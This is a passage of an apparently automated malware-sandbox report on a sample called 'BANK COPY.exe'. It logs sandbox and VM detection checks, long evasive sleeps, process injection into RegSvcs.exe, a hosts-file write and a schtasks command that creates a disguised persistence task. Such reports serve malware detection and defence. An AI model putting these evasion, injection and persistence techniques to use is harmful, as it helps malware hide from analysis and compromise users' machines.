                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: BANK COPY.exe PID: 5724, type: MEMORYSTR
                  Source: BANK COPY.exe, 00000000.00000002.284491796.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000002.289223085.000000000312B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: BANK COPY.exe, 00000000.00000002.284491796.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000002.289223085.000000000312B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\BANK COPY.exe TID: 5664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 5240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 3400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\BANK COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9787Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: BANK COPY.exe, 00000000.00000002.289223085.000000000312B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                  Source: BANK COPY.exe, 00000000.00000002.289223085.000000000312B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: BANK COPY.exe, 00000000.00000002.289223085.000000000312B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: BANK COPY.exe, 00000000.00000002.289223085.000000000312B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: BANK COPY.exe, 00000000.00000002.289223085.000000000312B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                  Source: BANK COPY.exe, 00000000.00000002.289223085.000000000312B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: BANK COPY.exe, 00000000.00000002.289223085.000000000312B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: BANK COPY.exe, 00000000.00000002.289223085.000000000312B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: RegSvcs.exe, 00000007.00000003.329884668.000000000665A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.521575260.000000000665A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000003.328729259.000000000664C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllbooleanMappingStrings
                  Source: BANK COPY.exe, 00000000.00000002.289223085.000000000312B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069764D0 LdrInitializeThunk,7_2_069764D0
                  Source: C:\Users\user\Desktop\BANK COPY.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\BANK COPY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 436000Jump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000Jump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FF7008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gPxsznxm" /XML "C:\Users\user\AppData\Local\Temp\tmp1205.tmpJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}Jump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Users\user\Desktop\BANK COPY.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
